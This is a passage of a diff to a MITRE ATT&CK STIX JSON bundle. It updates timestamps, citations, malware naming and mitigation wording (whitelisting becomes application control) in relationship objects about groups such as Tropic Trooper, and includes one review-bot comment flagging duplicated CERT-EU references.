+ "modified": "2020-06-20T20:11:42.310Z",
"created": "2019-06-13T16:53:10.350Z"
},
{
@@ -137303,7 +138634,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-14T18:19:15.031Z",
+ "modified": "2020-07-06T17:54:28.228Z",
"created": "2019-06-13T18:58:06.815Z"
},
{
@@ -137324,7 +138655,7 @@
}
],
"type": "relationship",
- "modified": "2019-07-16T20:53:20.713Z",
+ "modified": "2020-07-14T19:44:50.992Z",
"created": "2019-06-13T18:59:41.067Z"
},
{
@@ -137958,7 +139289,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.431Z",
+ "modified": "2020-06-09T20:44:40.825Z",
"created": "2019-06-14T17:21:38.567Z"
},
{
@@ -137972,7 +139303,7 @@
"description": "Ensure that local administrator accounts have complex, unique passwords across all systems on the network.",
"id": "relationship--7a3426bf-1751-43db-b844-6bf388a4c817",
"type": "relationship",
- "modified": "2020-03-25T16:25:17.406Z",
+ "modified": "2020-06-09T20:44:40.822Z",
"created": "2019-06-14T17:21:38.582Z"
},
{
@@ -137998,7 +139329,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.433Z",
+ "modified": "2020-06-09T20:44:40.851Z",
"created": "2019-06-14T17:21:38.632Z"
},
{
@@ -138136,16 +139467,21 @@
"target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
"external_references": [
{
- "description": "Hulcoop, A., et al. (2016, November 17). It\u2019s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.",
+ "source_name": "CitizenLab KeyBoy Nov 2016",
"url": "https://citizenlab.ca/2016/11/parliament-keyboy/",
- "source_name": "CitizenLab KeyBoy Nov 2016"
+ "description": "Hulcoop, A., et al. (2016, November 17). It\u2019s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019."
+ },
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has been known to side-load DLLs using a valid version of Windows Address Book executable with one of their tools.(Citation: CitizenLab KeyBoy Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: Anomali Pirate Panda April 2020)",
"relationship_type": "uses",
"id": "relationship--77dbc1ae-556e-43cd-b776-c7670ab5c915",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.310Z",
+ "modified": "2020-05-21T12:59:00.606Z",
"created": "2019-06-17T18:43:35.376Z"
},
{
@@ -138160,13 +139496,18 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.",
"url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf",
"source_name": "TrendMicro TropicTrooper 2015"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) used pr to scan for open ports on target systems.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) used pr and an openly available tool to scan for open ports on target systems.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)",
"relationship_type": "uses",
"id": "relationship--5929ef3e-3945-4ede-b3cd-94f47850a6bd",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.307Z",
+ "modified": "2020-05-21T14:55:00.488Z",
"created": "2019-06-17T18:43:35.392Z"
},
{
@@ -138190,27 +139531,6 @@
"modified": "2019-06-30T22:44:28.340Z",
"created": "2019-06-17T18:43:35.447Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "external_references": [
- {
- "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.",
- "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf",
- "source_name": "TrendMicro TropicTrooper 2015"
- }
- ],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has detected a target system\u2019s OS version.(Citation: TrendMicro TropicTrooper 2015)",
- "relationship_type": "uses",
- "id": "relationship--eba2ecc5-b383-4cbb-93f9-9cef81cd016b",
- "type": "relationship",
- "modified": "2019-06-30T22:44:28.338Z",
- "created": "2019-06-17T18:43:35.470Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -138267,7 +139587,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) encrypts its configuration file using a simple algorithm.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) encrypts its configuration file using a simple algorithm.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--93b3993d-0345-434e-9b0a-4dfd8efa6c99",
"type": "relationship",
@@ -138288,7 +139608,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) decrypts downloaded files before execution.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) decrypts downloaded files before execution.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--74e1dbd9-baad-488f-9b30-4430420e15d3",
"type": "relationship",
@@ -138309,7 +139629,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) checks for the system\u2019s Windows OS version and hostname.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) checks for the system\u2019s Windows OS version and hostname.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--01c60a20-2eff-4b4e-a15a-24e56a487b4e",
"type": "relationship",
@@ -138330,7 +139650,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--618d4835-6022-46df-bee1-38fcb97ffb91",
"type": "relationship",
@@ -138351,7 +139671,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) uses HTTP GET requests to download other files that are executed in memory.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP GET requests to download other files that are executed in memory.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--1729ebeb-c92c-4d8e-a859-0d081b3821a1",
"type": "relationship",
@@ -138419,11 +139739,11 @@
"source_name": "PWC KeyBoys Feb 2017"
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) installs a service pointing to a malicious DLL dropped to disk.(Citation: PWC KeyBoys Feb 2017)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has installed a service pointing to a malicious DLL dropped to disk.(Citation: PWC KeyBoys Feb 2017)",
"relationship_type": "uses",
"id": "relationship--03fcc016-f9a2-491d-8d9f-92aa4b4c4d4a",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.367Z",
+ "modified": "2020-05-29T03:23:28.167Z",
"created": "2019-06-17T19:35:16.095Z"
},
{
@@ -138957,7 +140277,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
"relationship_type": "mitigates",
- "description": "Identify and block potentially malicious software executed that may be executed through this technique by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Identify and block potentially malicious software executed that may be executed through this technique by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--42f4db8f-ef8b-4dcc-8c8f-4d0b5219c8b7",
"external_references": [
{
@@ -138992,7 +140312,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-15T15:52:05.699Z",
+ "modified": "2020-07-01T16:19:54.904Z",
"created": "2019-06-20T14:28:20.218Z"
},
{
@@ -139427,7 +140747,7 @@
"description": "Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.",
"id": "relationship--25a84607-970c-474e-83bc-143e2ccbb64b",
"type": "relationship",
- "modified": "2019-07-17T21:23:45.627Z",
+ "modified": "2020-07-14T19:31:46.710Z",
"created": "2019-06-20T15:39:37.667Z"
},
{
@@ -139441,7 +140761,7 @@
"description": "Prevent adversary access to privileged accounts or access necessary to replace system firmware.",
"id": "relationship--b4dafcd2-fed8-4266-b83e-f4033ada0d55",
"type": "relationship",
- "modified": "2019-07-17T21:23:45.639Z",
+ "modified": "2020-07-14T19:31:46.727Z",
"created": "2019-06-20T15:39:37.686Z"
},
{
@@ -139455,7 +140775,7 @@
"description": "Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification.",
"id": "relationship--f365854f-76e6-4746-bab8-2f2b94b50087",
"type": "relationship",
- "modified": "2019-07-17T21:23:45.641Z",
+ "modified": "2020-07-14T19:31:46.725Z",
"created": "2019-06-20T15:39:37.694Z"
},
{
@@ -139490,6 +140810,16 @@
"description": "When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)\n\nDepending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)\n\nAs immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)",
"id": "relationship--52fcde3f-d3af-4785-940f-5856dd657455",
"external_references": [
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
{
"source_name": "CERT-EU DDoS March 2017",
"url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
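Review bot: The two `external_references` entries added ahead of the existing `CERT-EU DDoS March 2017` entry are byte-identical to it (same `source_name`, `url` and `description`), so this relationship now carries the same reference three times. This looks like one reference being emitted per `(Citation: CERT-EU DDoS March 2017)` occurrence in the `description` rather than per distinct source, though that is inferred from the data rather than visible here. Duplicates are harmless to consumers that index references by `source_name`, but they inflate the bundle and produce repeated citations in any renderer that iterates the list. If this file is a verbatim copy of the upstream bundle the fix belongs upstream; otherwise dedupe `external_references` on `source_name` before committing.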
@@ -139497,7 +140827,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T01:11:29.091Z",
+ "modified": "2020-06-01T13:16:33.152Z",
"created": "2019-06-20T15:44:50.969Z"
},
{
@@ -139546,7 +140876,7 @@
"description": "Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.",
"id": "relationship--c00535d0-6e59-4293-8034-70e5bf94a74a",
"type": "relationship",
- "modified": "2019-07-18T19:18:32.970Z",
+ "modified": "2020-07-14T19:34:47.776Z",
"created": "2019-06-20T16:18:23.049Z"
},
{
@@ -139560,7 +140890,7 @@
"description": "Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.",
"id": "relationship--e28dc4ab-86fe-480e-9f0d-d7fab54c432d",
"type": "relationship",
- "modified": "2019-07-18T19:18:32.968Z",
+ "modified": "2020-07-14T19:34:47.793Z",
"created": "2019-06-20T16:18:23.056Z"
},
{
@@ -139574,7 +140904,7 @@
"description": "Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.",
"id": "relationship--40cd458c-5a59-4a8d-a04a-3cd3faebaf66",
"type": "relationship",
- "modified": "2019-07-18T19:18:32.969Z",
+ "modified": "2020-07-14T19:34:47.795Z",
"created": "2019-06-20T16:18:23.058Z"
},
{
@@ -139721,7 +141051,7 @@
"description": "Develop and publish policies that define acceptable information to be stored in repositories.",
"id": "relationship--2ffde834-36f9-463d-93c4-77048f020cf9",
"type": "relationship",
- "modified": "2020-03-24T14:48:47.995Z",
+ "modified": "2020-06-30T22:50:06.270Z",
"created": "2019-06-20T18:55:36.315Z"
},
{
@@ -139735,7 +141065,7 @@
"description": "Consider periodic review of accounts and privileges for critical and sensitive repositories.",
"id": "relationship--eacf09ab-0264-4af8-bfa5-f3be9df47e3f",
"type": "relationship",
- "modified": "2020-03-24T14:48:48.026Z",
+ "modified": "2020-06-30T22:50:06.278Z",
"created": "2019-06-20T18:55:36.343Z"
},
{
@@ -139864,7 +141194,7 @@
"description": "If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.",
"id": "relationship--af393cd2-2a5a-41f8-a1b1-218f30beb4dd",
"type": "relationship",
- "modified": "2020-02-05T14:15:23.264Z",
+ "modified": "2020-06-20T22:45:46.677Z",
"created": "2019-06-21T12:06:48.737Z"
},
{
@@ -140014,7 +141344,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-09T14:52:27.074Z",
+ "modified": "2020-05-13T22:50:51.515Z",
"created": "2019-06-21T13:56:39.436Z"
},
{
@@ -140028,7 +141358,7 @@
"description": "Close all browser sessions regularly and when they are no longer needed.",
"id": "relationship--8d6d88c3-dbfe-492a-8c4c-ee4bfc10bdc3",
"type": "relationship",
- "modified": "2019-07-18T15:36:27.537Z",
+ "modified": "2020-07-14T19:39:44.780Z",
"created": "2019-06-21T13:58:04.205Z"
},
{
@@ -140126,7 +141456,7 @@
}
],
"type": "relationship",
- "modified": "2019-07-17T21:17:03.583Z",
+ "modified": "2020-07-14T19:49:47.589Z",
"created": "2019-06-21T14:29:50.951Z"
},
{
@@ -140154,7 +141484,7 @@
"description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.",
"id": "relationship--3a348ba8-5608-4e9b-a180-f66cfad9896e",
"type": "relationship",
- "modified": "2019-06-21T14:45:42.420Z",
+ "modified": "2020-07-14T19:43:38.276Z",
"created": "2019-06-21T14:45:42.420Z"
},
{
@@ -140224,7 +141554,7 @@
"description": "Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to remote access services.",
"id": "relationship--d5c70727-794c-4404-b30d-0d798a62ad64",
"type": "relationship",
- "modified": "2020-03-27T18:01:17.924Z",
+ "modified": "2020-06-20T20:42:37.456Z",
"created": "2019-06-21T15:13:50.808Z"
},
{
@@ -140346,7 +141676,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T20:59:39.951Z",
+ "modified": "2020-06-20T22:44:36.276Z",
"created": "2019-06-21T16:21:55.301Z"
},
{
@@ -140367,7 +141697,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T20:59:39.918Z",
+ "modified": "2020-06-20T22:44:36.303Z",
"created": "2019-06-21T16:21:55.304Z"
},
{
@@ -140406,10 +141736,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
"relationship_type": "mitigates",
- "description": "Application whitelisting may be able to prevent the running of executables masquerading as other files.",
+ "description": "Application control may be able to prevent the running of executables masquerading as other files.",
"id": "relationship--225ab1b4-f800-4a92-9949-a0f05fce6213",
"type": "relationship",
- "modified": "2020-03-11T14:55:31.329Z",
+ "modified": "2020-06-20T20:11:42.519Z",
"created": "2019-06-21T16:28:45.465Z"
},
{
@@ -140451,7 +141781,7 @@
"description": "Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary.",
"id": "relationship--a42398e2-3daa-452a-80f8-f06660328f18",
"type": "relationship",
- "modified": "2019-10-11T15:20:53.996Z",
+ "modified": "2020-07-14T19:38:14.419Z",
"created": "2019-06-21T16:45:15.046Z"
},
{
@@ -140465,7 +141795,7 @@
"description": "Network segmentation can be used to isolate infrastructure components that do not require broad network access.",
"id": "relationship--f0e9a1f7-8600-4558-9d2e-91126c42b126",
"type": "relationship",
- "modified": "2019-10-11T15:20:53.998Z",
+ "modified": "2020-07-14T19:38:14.434Z",
"created": "2019-06-21T16:45:15.071Z"
},
{
@@ -140479,7 +141809,7 @@
"description": "Certain developer utilities should be blocked or restricted if not required.",
"id": "relationship--8c0286e0-036d-4282-9e54-6938c958b7e9",
"type": "relationship",
- "modified": "2020-03-29T19:49:15.926Z",
+ "modified": "2020-06-20T22:43:41.446Z",
"created": "2019-06-21T16:52:53.737Z"
},
{
@@ -140493,7 +141823,7 @@
"description": "Specific developer utilities may not be necessary within a given environment and should be removed if not used.",
"id": "relationship--f4e83a18-a2bf-45af-aa6b-18f72646d8b6",
"type": "relationship",
- "modified": "2020-03-29T19:49:15.928Z",
+ "modified": "2020-06-20T22:43:41.455Z",
"created": "2019-06-21T16:52:53.740Z"
},
{
@@ -140647,7 +141977,7 @@
"description": "Protect shared folders by minimizing users who have write access.",
"id": "relationship--ecf9df35-e4f5-4041-a65d-0e897e5435b0",
"type": "relationship",
- "modified": "2020-02-12T20:27:07.919Z",
+ "modified": "2020-03-31T22:14:56.186Z",
"created": "2019-06-21T17:38:45.794Z"
},
{
@@ -140661,7 +141991,7 @@
"description": "Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).",
"id": "relationship--f66af3ae-266c-4aa1-a6b4-f1ff87aff601",
"type": "relationship",
- "modified": "2020-02-12T20:27:07.918Z",
+ "modified": "2020-03-31T22:14:56.209Z",
"created": "2019-06-21T17:38:45.809Z"
},
{
@@ -140672,7 +142002,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
"relationship_type": "mitigates",
- "description": "Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using application control (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--b0831323-de94-498a-8338-c60778bef95f",
"external_references": [
{
@@ -140702,7 +142032,7 @@
}
],
"type": "relationship",
- "modified": "2020-02-12T20:27:07.935Z",
+ "modified": "2020-06-20T20:11:42.543Z",
"created": "2019-06-21T17:38:45.822Z"
},
{
@@ -140811,17 +142141,17 @@
"source_ref": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"target_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7",
"relationship_type": "mitigates",
- "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well. (Citation: OWASP Top 10 2017)",
+ "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)",
"id": "relationship--d5be72df-7267-4524-85fa-a497a0cd8052",
"external_references": [
{
- "source_name": "OWASP Top 10 2017",
- "url": "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf",
- "description": "OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019."
+ "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+ "source_name": "OWASP Top 10"
}
],
"type": "relationship",
- "modified": "2020-03-11T14:19:57.049Z",
+ "modified": "2020-07-14T22:22:06.434Z",
"created": "2019-06-21T18:37:11.945Z"
},
{
@@ -141133,10 +142463,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
"relationship_type": "mitigates",
- "description": "Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--54d2ea67-40fd-4fbc-b76a-01879aa5bff5",
"type": "relationship",
- "modified": "2020-03-29T19:34:19.724Z",
+ "modified": "2020-06-20T22:39:47.681Z",
"created": "2019-06-24T11:33:53.013Z"
},
{
@@ -141228,7 +142558,7 @@
"description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.",
"id": "relationship--a0a004fe-2636-4f6d-85c7-2401768252a2",
"type": "relationship",
- "modified": "2019-06-24T12:03:02.500Z",
+ "modified": "2020-07-14T19:47:47.062Z",
"created": "2019-06-24T12:03:02.500Z"
},
{
@@ -141249,7 +142579,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-15T15:37:58.049Z",
+ "modified": "2020-05-14T13:05:39.706Z",
"created": "2019-06-24T12:06:10.358Z"
},
{
@@ -142702,7 +144032,7 @@
}
],
"type": "relationship",
- "modified": "2019-07-18T17:52:28.573Z",
+ "modified": "2020-07-14T19:45:59.779Z",
"created": "2019-06-24T16:07:33.575Z"
},
{
@@ -142805,9 +144135,9 @@
"target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -142819,7 +144149,7 @@
"relationship_type": "uses",
"id": "relationship--0d4d7376-5bda-44bc-b90d-0a065bb99433",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.561Z",
+ "modified": "2020-06-02T16:14:00.473Z",
"created": "2019-06-24T17:08:51.561Z"
},
{
@@ -142886,10 +144216,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--87fd0088-41da-47ac-bd69-a8ac151a0d39",
"type": "relationship",
- "modified": "2020-03-28T16:19:45.895Z",
+ "modified": "2020-06-25T03:19:34.222Z",
"created": "2019-06-24T18:00:41.676Z"
},
{
@@ -143239,7 +144569,7 @@
"source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"target_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2",
"relationship_type": "mitigates",
- "description": "\nBlock SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with whitelisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)",
+ "description": "\nBlock SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with allowlisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)",
"id": "relationship--85c9285a-6738-42dd-aa12-fbded3e7bbdb",
"external_references": [
{
@@ -143254,7 +144584,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T20:32:06.054Z",
+ "modified": "2020-06-20T20:46:36.547Z",
"created": "2019-06-24T19:53:23.769Z"
},
{
@@ -143408,7 +144738,7 @@
"description": "Require that all executables be placed in write-protected directories.",
"id": "relationship--458eb231-ded2-4941-aeaa-875263ac20ab",
"type": "relationship",
- "modified": "2020-03-30T13:45:24.482Z",
+ "modified": "2020-07-06T18:49:35.885Z",
"created": "2019-06-25T12:02:27.819Z"
},
{
@@ -143419,7 +144749,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02",
"relationship_type": "mitigates",
- "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--cef9c309-edd5-48a6-afc9-de7e13a0cc05",
"external_references": [
{
@@ -143454,7 +144784,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-30T13:45:24.513Z",
+ "modified": "2020-07-06T18:49:35.924Z",
"created": "2019-06-25T12:02:27.823Z"
},
{
@@ -143485,7 +144815,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-30T13:45:24.496Z",
+ "modified": "2020-07-06T18:49:35.975Z",
"created": "2019-06-25T12:02:27.825Z"
},
{
@@ -143527,7 +144857,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T20:43:54.739Z",
+ "modified": "2020-06-20T22:14:08.576Z",
"created": "2019-06-25T12:15:00.109Z"
},
{
@@ -143646,7 +144976,7 @@
"description": "Use file system access controls to protect folders such as C:\\\\Windows\\\\System32.",
"id": "relationship--72de6e56-e5d1-4a3f-aa85-d7155f7ff42c",
"type": "relationship",
- "modified": "2020-03-29T20:10:19.399Z",
+ "modified": "2020-07-09T13:54:28.922Z",
"created": "2019-06-25T12:37:30.052Z"
},
{
@@ -143660,7 +144990,7 @@
"description": "Require signed binaries.",
"id": "relationship--4fd3ec25-00ed-48c1-af72-e2523959860e",
"type": "relationship",
- "modified": "2020-03-29T20:10:19.430Z",
